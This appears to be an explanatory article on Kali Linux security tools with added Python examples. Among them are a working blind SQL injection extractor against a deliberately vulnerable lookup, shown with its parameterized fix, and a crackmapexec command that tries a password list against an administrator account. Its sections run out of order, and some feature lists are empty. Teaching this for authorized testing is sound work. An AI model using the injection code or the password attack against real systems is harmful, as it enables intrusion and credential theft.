This article presents a Linux distribution that serves as a true toolbox for testing the security of a corporate network: Kali Linux. Renowned to the point of being integrated into several cybersecurity certifications, this distribution is dedicated to penetration testing, security auditing, and post-incident forensic investigation.
Based on Debian, Kali Linux ships more than 600 utilities that help administrators discover vulnerabilities, correct configuration errors, find exposed data, and more.
You can run Kali Linux on a physical machine, as a virtual machine, from a bootable medium, from cloud images, or even as a container.
Learning to use Kali Linux effectively can be intimidating, especially if you are an administrator with other responsibilities. Familiarizing yourself with the available tools helps you understand when and how to use Kali to get the best results.
Warning: tools such as those in Kali Linux must be used legally and responsibly by security professionals, but they can also be used illicitly and unethically. Ensure that any intended use is ethical, legal, and authorized in writing by the owner of the systems being tested. If you are unsure of the legality, do not proceed until you are certain; this may require research on your part, such as an honest discussion with your internal legal counsel about what you have planned.
There are two other Linux distributions specializing in cybersecurity: ParrotOS and BlackArch Linux. They are less focused on network security than Kali Linux and are more often used for testing the security of servers and workstations.
The Kali menu classifies its utilities into several categories, including:
- Information gathering. This category includes the host, port, and service scanners covered below.

At a glance, the main features of the tools covered in this article are the following.

Masscan:
- Banner capture on multiple protocols.
- Transmission of up to 10 million packets per second from a single machine.
- Asynchronous transmission: Masscan sends and receives independently, so it does not wait for the response to one probe before sending the next.

Unicornscan:
- TCP banner capture.
- UDP (User Datagram Protocol) scanning.
- Recording and filtering of packet capture (PCAP) files.
- Identification of operating systems, applications, and components.

Metasploit:
- Exploits and payloads, as well as auxiliary modules that do not use payloads.
- A common way of working with exploit code: payloads are reusable, and every exploit is driven through the same interface.

Burp Suite:
- A spider, a token randomness analyzer (Sequencer), a request repeater, and an intercepting proxy.
- Checks for SQL injection, cross-site scripting, OS command injection, HTTP request handling flaws, broken authentication, and more.
- Support for both static and dynamic testing.

Hydra:
- Supports more than 20 different protocols.
- Accepts password lists (wordlists).
- Is fast and efficient.

Aircrack-ng:
- Focuses on 802.11 wireless local networks.
- Provides command-line tools that allow for intensive scripting.
- Performs WEP dictionary attacks and fragmentation attacks.

Kismet:
- Detects unauthorized (rogue) access points (APs).
- Supports radio frequency sensors, Zigbee, and multiple beacon types.
- Produces captures compatible with tcpdump and Wireshark.
13/ Nmap
Nmap (Network Mapper) is an open source network scanning tool. It discovers hosts and services on a network by sending packets and analyzing the responses.
The main features of this tool are:
- Host discovery: identifying the active hosts on a network.
- Port scanning: determining which ports are open on a host.
- Version detection: identifying the versions of the services running on a host.
- Operating system detection: attempting to determine the operating system running on a host.
- Scripting: automating complex tasks with the Nmap Scripting Engine (NSE).
14/ Wireshark and tcpdump
Wireshark is an open source network packet analyzer. It captures network traffic in real time and lets practitioners inspect the contents of each packet.
Tcpdump is a command-line tool for capturing and analyzing network traffic. It is often used on servers and embedded systems, where no graphical interface is available; its captures can be saved as PCAP files and opened later in Wireshark for detailed analysis.
15/ Arpwatch
Arpwatch is a tool that monitors Ethernet and ARP traffic. It maintains a database of the pairings between MAC and IP addresses; when it detects a change, such as a new address or a modified pairing, it alerts administrators.
The main features of this tool are:
- Produces logs and can send e-mail alerts to practitioners.
- Helps detect ARP spoofing.
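The detection logic described above, as an added example that is not arpwatch's own code: it keeps the same kind of IP-to-MAC database and raises the same kinds of events arpwatch reports ("new station", "changed ethernet address", "flip flop"), run over a constructed set of ARP replies in which a second host starts answering for the gateway's IP address. The record format, the addresses, and the timestamps are all constructed for the example.

```python
"""Arpwatch-style ARP monitor run over constructed ARP replies.

Added example, not arpwatch's code. A database of IP -> MAC pairings is
kept; a reply that introduces a new pairing, changes an existing one, or
bounces back to an earlier MAC ("flip flop", the classic ARP spoofing sign)
produces an event. The records below are constructed, not captured.
"""
from __future__ import annotations

from dataclasses import dataclass, field


@dataclass
class Event:
    kind: str            # "new station" | "changed ethernet address" | "flip flop"
    ip: str
    mac: str
    old_mac: str | None
    ts: int


@dataclass
class ArpMonitor:
    current: dict[str, str] = field(default_factory=dict)   # ip -> MAC now
    previous: dict[str, str] = field(default_factory=dict)  # ip -> MAC before that
    events: list[Event] = field(default_factory=list)

    def observe(self, ip: str, mac: str, ts: int) -> Event | None:
        mac = mac.lower()
        old = self.current.get(ip)
        if old is None:
            kind = "new station"
        elif old == mac:
            return None                      # same pairing as before: stay quiet
        elif self.previous.get(ip) == mac:
            kind = "flip flop"               # back to an earlier MAC: two hosts claim one IP
        else:
            kind = "changed ethernet address"
        if old is not None:
            self.previous[ip] = old
        self.current[ip] = mac
        ev = Event(kind, ip, mac, old, ts)
        self.events.append(ev)
        return ev


def parse_arp_line(line: str) -> tuple[str, str, int]:
    """Parse the constructed 'timestamp ip mac' record format."""
    ts, ip, mac = line.split()
    return ip, mac, int(ts)


# Constructed sample: the gateway 10.0.0.1 legitimately sits at aa:...:01.
# At ts 1700000020 a host at de:ad:be:ef:00:01 starts answering for it
# (ARP spoofing); the real gateway keeps replying, producing flip flops.
SAMPLE_ARP_REPLIES = """\
1700000000 10.0.0.1  aa:aa:aa:aa:aa:01
1700000001 10.0.0.7  aa:aa:aa:aa:aa:07
1700000010 10.0.0.1  aa:aa:aa:aa:aa:01
1700000020 10.0.0.1  de:ad:be:ef:00:01
1700000021 10.0.0.1  aa:aa:aa:aa:aa:01
1700000022 10.0.0.1  de:ad:be:ef:00:01
"""


def run_monitor(text: str = SAMPLE_ARP_REPLIES) -> list[Event]:
    """Feed every record to the monitor and return the events it raised."""
    mon = ArpMonitor()
    for line in text.splitlines():
        if line.strip():
            mon.observe(*parse_arp_line(line))
    return mon.events


def suspected_spoofing(events: list[Event]) -> set[str]:
    """IPs that flip-flopped between MACs: the pattern arpwatch alerts on."""
    return {e.ip for e in events if e.kind == "flip flop"}


if __name__ == "__main__":
    for e in run_monitor():
        print(f"{e.ts} {e.kind}: {e.ip} {e.old_mac or '-'} -> {e.mac}")
    print("suspected spoofing:", suspected_spoofing(run_monitor()))
```

A single "changed ethernet address" event is often benign (a replaced network card, a DHCP lease moving to another host); it is the rapid alternation between two MACs for one IP, the flip flop, that should page someone.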
16/ Sqlmap
Sqlmap is an automated tool for finding and exploiting SQL injection vulnerabilities. It works with Microsoft SQL Server, MySQL, PostgreSQL, Oracle, and others.
The main features of this tool are:
- Performs boolean-based, time-based, and error-based injections.
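An added example, not sqlmap's own code, of the boolean-based technique listed above in miniature: an application lookup that only answers yes or no is enough of an oracle to extract a secret one character at a time, which is exactly what sqlmap automates at scale. The SQLite database, its users, the secret value, and the function names are all constructed for the example; the parameterized version shows the fix.

```python
"""Boolean-based blind SQL injection, what sqlmap automates, in miniature.

Added example, not sqlmap's code. A constructed SQLite database exposes a
deliberately vulnerable lookup that returns only True/False; a secret is
recovered through that oracle with binary search per character, and the
parameterized query that closes the hole is shown alongside.
"""
import sqlite3

SECRET = "s3cr3t!"   # constructed value that the attack will recover


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "wonderland"), ("admin", SECRET)])
    return db


def user_exists_vulnerable(db, username: str) -> bool:
    # VULNERABLE: string concatenation; the caller controls part of the SQL.
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"
    return db.execute(sql).fetchone() is not None


def user_exists_safe(db, username: str) -> bool:
    # FIXED: bound parameter; the input is data, never SQL text.
    sql = "SELECT 1 FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchone() is not None


def oracle(db, lookup, condition: str) -> bool:
    """Ask a yes/no question by injecting it after a known-good username."""
    return lookup(db, f"alice' AND ({condition}) -- ")


def blind_extract(db, lookup, column="password", where="username='admin'", max_len=32) -> str:
    """Recover a value one character at a time through the boolean oracle."""
    target = f"(SELECT {column} FROM users WHERE {where})"
    # Length first, with LENGTH(x) > n questions (sqlmap does the same probe).
    length = 0
    while length < max_len and oracle(db, lookup, f"LENGTH({target}) > {length}"):
        length += 1
    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126                     # printable ASCII range
        while lo < hi:                       # binary search: ~7 requests per character
            mid = (lo + hi) // 2
            if oracle(db, lookup, f"UNICODE(SUBSTR({target}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    db = make_db()
    print("recovered via vulnerable lookup:", blind_extract(db, user_exists_vulnerable))
    print("recovered via fixed lookup:", repr(blind_extract(db, user_exists_safe)))
```

Against the parameterized lookup the injected string is simply a username that does not exist, so every probe answers "no" and nothing is extracted; that is the whole point of binding parameters rather than escaping input.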
CrackMapExec: A Powerful Post-Exploitation Tool
CrackMapExec (CME) is a Swiss Army knife for Active Directory post-exploitation, enabling penetration testers and security professionals to efficiently audit and compromise Windows networks. Originally developed by byt3bl33d3r, CME automates many tasks traditionally performed by hand, significantly reducing the time required to assess network security.
Core Functionality and Features
CME functions as a modular framework, offering a wide range of features including:
- Credential attacks and harvesting: CME tests credentials at scale, including password spraying across many hosts and accounts, and can dump the SAM database, LSA secrets, and NTDS.dit from systems it has access to.
- Remote code execution: it allows the execution of arbitrary commands on remote Windows machines, facilitating further exploitation.
- Active Directory enumeration: CME maps the Active Directory environment, identifying users, groups, computers, shares, logged-on sessions, and their relationships.
- Pass-the-hash: CME accepts NTLM hashes in place of passwords, so stolen hashes can be used to authenticate to other systems.
- SMB access: it authenticates and executes over the Server Message Block (SMB) protocol and includes modules that check hosts for known SMB vulnerabilities.
Example: Enumerating Domain Information
A common use case for CME is quickly gathering information about a target. For example, with the command
crackmapexec smb 192.168.1.10 -u administrator -p passwords.txt
a penetration tester attempts to authenticate to the machine at 192.168.1.10 as the 'administrator' user, trying each password from the file 'passwords.txt'. The same command performs initial enumeration of the system, revealing the operating system version, hostname, domain, and whether SMB signing is required. This streamlines the reconnaissance phase of a penetration test. Note that trying a whole list of passwords against one account will lock it out under a typical domain lockout policy; in practice, testers spray one password across many accounts and stay below the lockout threshold. CrackMapExec is included as a standard tool in Kali Linux and is documented on the Kali Linux tools page. It is written in Python; the original repository is https://github.com/byt3bl33d3r/CrackMapExec, and active development now continues in the community fork NetExec.
2/ Masscan
Masscan is an IP port scanner that offers many of the same features as Nmap. The main difference is that Masscan is designed to scan large networks, many machines, or the whole Internet very quickly, whereas Nmap is intended for more targeted scans of a single network or machine. Masscan's speed comes at a price: it can generate enough traffic to disrupt a network, so its transmit rate should be limited (its --rate option) when scanning production infrastructure.
Its main features are listed in the overview at the beginning of this article.
According to its author, Robert Graham, Masscan can scan the entire Internet in under six minutes.
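To make the asynchronous design concrete, here is an added example, not Masscan's code, of the SYN-cookie technique that stateless scanners such as Masscan rely on: instead of keeping a table entry per outstanding probe, the scanner derives each probe's TCP sequence number from the target address, port, and a secret, and recomputes it when a reply arrives. Transmit and receive can therefore run independently, and forged or unsolicited SYN/ACKs are rejected. Packets are plain in-memory dictionaries and the target is simulated; the class and function names are constructed for the example.

```python
"""Stateless SYN scanning with SYN cookies, the trick behind Masscan's speed.

Added illustrative example, not Masscan's code. The scanner stores nothing
per probe: the sequence number it sends is a keyed hash of the target
(ip, port) and its own source port, so any reply can be validated purely
from its own header fields. Packets are constructed dicts, not real sockets.
"""
from __future__ import annotations

import hashlib
import hmac
import os


class StatelessScanner:
    def __init__(self, secret: bytes | None = None, src_port: int = 40000):
        self.secret = secret or os.urandom(16)   # per-scan key; never reused
        self.src_port = src_port

    def cookie(self, dst_ip: str, dst_port: int) -> int:
        """32-bit sequence number derived from the probe's identity and the secret."""
        msg = f"{dst_ip}:{dst_port}:{self.src_port}".encode()
        digest = hmac.new(self.secret, msg, hashlib.blake2s).digest()
        return int.from_bytes(digest[:4], "big")

    def make_syn(self, dst_ip: str, dst_port: int) -> dict:
        # Nothing is recorded: the cookie *is* the state.
        return {"dst": dst_ip, "dport": dst_port, "sport": self.src_port,
                "flags": "S", "seq": self.cookie(dst_ip, dst_port)}

    def classify_reply(self, pkt: dict) -> str | None:
        """'open'/'closed' for a reply matching a probe we sent, else None."""
        if pkt.get("dport") != self.src_port:
            return None
        # A genuine reply acknowledges our sequence number + 1.
        expected = (self.cookie(pkt["src"], pkt["sport"]) + 1) & 0xFFFFFFFF
        if pkt.get("ack") != expected:
            return None                 # unsolicited, spoofed, or from another scan
        if pkt["flags"] == "SA":
            return "open"
        if pkt["flags"] == "RA":
            return "closed"
        return None


def simulate_target(syn: dict, open_ports) -> dict:
    """Constructed target stack: SYN/ACK for open ports, RST/ACK otherwise."""
    flags = "SA" if syn["dport"] in open_ports else "RA"
    return {"src": syn["dst"], "sport": syn["dport"], "dport": syn["sport"],
            "flags": flags, "ack": (syn["seq"] + 1) & 0xFFFFFFFF}


def scan(targets, open_ports, scanner: StatelessScanner | None = None) -> dict:
    """Blast probes without waiting, then classify replies in any order."""
    scanner = scanner or StatelessScanner()
    probes = [scanner.make_syn(ip, p) for ip, p in targets]          # transmit phase
    replies = [simulate_target(s, open_ports) for s in reversed(probes)]  # arrive out of order
    results = {}
    for r in replies:                                                 # receive phase
        verdict = scanner.classify_reply(r)
        if verdict:
            results[(r["src"], r["sport"])] = verdict
    return results


if __name__ == "__main__":
    targets = [("10.0.0.5", 22), ("10.0.0.5", 80), ("10.0.0.6", 443)]
    print(scan(targets, open_ports={22, 443}))
```

Because the receive side needs no table of outstanding probes, the transmit side can run at whatever rate the hardware allows; the cost is that a stateless scanner cannot complete the handshake, which is why Masscan's banner grabbing needs extra work beyond a plain SYN scan.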

3/ Unicornscan
Unicornscan is a stateless port scanner that sends data to potentially vulnerable TCP/IP devices and analyzes the results. It is ofen faster than Nmap on larger networks, and capable of masking its scans.
The main features of this tool are:
6/ Metasploit
Metasploit is a complete framework for gathering information about and executing exploits against targeted systems. It contains ready-to-use exploit modules and payloads for known vulnerabilities.
Its main features are listed in the overview at the beginning of this article.
If you are starting out with Metasploit, you can practise on Metasploitable, a deliberately vulnerable virtual machine intended for testing exploits and familiarizing yourself with the framework.
7/ Burp Suite
Burp Suite is a web application security testing platform developed by PortSwigger, a security testing software publisher. It identifies issues, performs in-depth analysis of websites, and can send modified HTTP requests to detect vulnerabilities.
Its main features are listed in the overview at the beginning of this article.

9/ Hydra
Hydra is a password auditing tool. It carries out brute-force attacks against a wide range of login protocols.
Its main features are listed in the overview at the beginning of this article.
10/ Aircrack-ng
Aircrack-ng is a suite of wireless security tools that includes several applications for monitoring, capturing, and injecting traffic. It includes airdecap-ng, a decryptor for WEP (Wired Equivalent Privacy) and WPA (Wi-Fi Protected Access) capture files; airodump-ng, which collects packets and WPA handshakes; airtun-ng, which creates virtual tunnel interfaces; and besside-ng, which automatically cracks WEP keys and captures WPA handshakes.
Its main features are listed in the overview at the beginning of this article.
11/ Kismet
Kismet is a wireless network and Bluetooth detector, sniffer, and wireless intrusion detection system (WIDS).
Its main features are listed in the overview at the beginning of this article.
12/ Wifite
Wifite is a wireless network penetration testing and auditing tool written in Python. It collects service set identifiers (SSIDs), signal strength, and other information about nearby networks, and automates attacks against WEP, WPA, and WPA2 keys.
